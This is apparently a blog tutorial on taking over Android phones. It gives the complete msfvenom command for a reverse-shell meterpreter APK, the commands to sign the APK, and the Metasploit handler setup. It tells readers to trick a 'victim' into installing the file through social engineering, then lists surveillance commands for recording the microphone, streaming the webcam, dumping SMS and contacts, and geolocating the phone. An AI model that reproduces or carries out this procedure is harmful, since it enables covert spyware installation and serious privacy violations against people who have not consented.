How to Hack android phone using METASPLOIT and MSFVENOM ~ Tech Odia

 

How to Hack android phone using METASPLOIT and MSFVENOM

When it comes to hacking Android phones, there are tonnes of ways for doing so. There are apps, web portals, scripts, and whatnot. We are going to guide you on how to hack an android phone using Metasploit and MSFVenom.

So today we are going to learn about MSFVenom and how to hack an Android phone using Metasploit & MSFVenom. MSFVenom is a hacking tool used to hack any Android devices by making malicious apks. MSFVenom is made up of MSFPayload and MSFEncode. MSFEncode is the exploit tool and MSFPayload is the command line interface used to generate and output all types of shell-codes available in Metasploit.

For performing this hack you’ll need Kali Linux OS installed in your computer and Android Phone as a target.

Below are the steps to perform this hack.

Step 1: Creating apk file

Open your KALI LINUX. Open your Terminal and type in the following command

# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.78.129 LPORT=4444 R > hackingworld.apk

Output:-

**LHOST= YOUR IP address

**LPORT= 4444

**Use ifconfig to find your IP address if you don`t know.

# ifconfig

Step 2: Delivering APK file to victim

2. You have now created your malicious spyware .apk file. It will be saved to your /home/ folder by default. Find your newly created hackingworld.apk and send it to your target (hackingworld.apk). Use social engineering to do this so that the victim does actually installs the apk.

**If you get any signing errors or issues use the following:

Keytool (Comes Pre-Installed in Kali Linux)

keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000

Jarsigner (Comes Pre-Installed in Kali Linux)

jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore hackingworld.apk aliasname

jarsigner -verify -verbose -certs hackingworld.apk

Step 3: Metasploit setup

. Open up a new terminal and use the following command to start Metasploit framework.

# msfconsole

Now in the Metasploit framework console type the following

msf  > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.78.129
msf exploit(handler) > set LPORT 4444
msf exploit(handler) > exploit

Here

**LHOST= YOUR IP address

**LPORT= 4444

Now when the user opens up the app on his/her phone you will get a session with that device. And whoa! The device is yours to operate.

Step 4: Exploit..!!!

Some commands you should definitely try:

– record_mic

– webcam_snap

– webcam_stream

– dump_contacts

– dump_sms

– geolocate

So, this was all about hacking an Android Phone using MSFVenom. For feedback, questions or issues, feel free to write them in the comments section.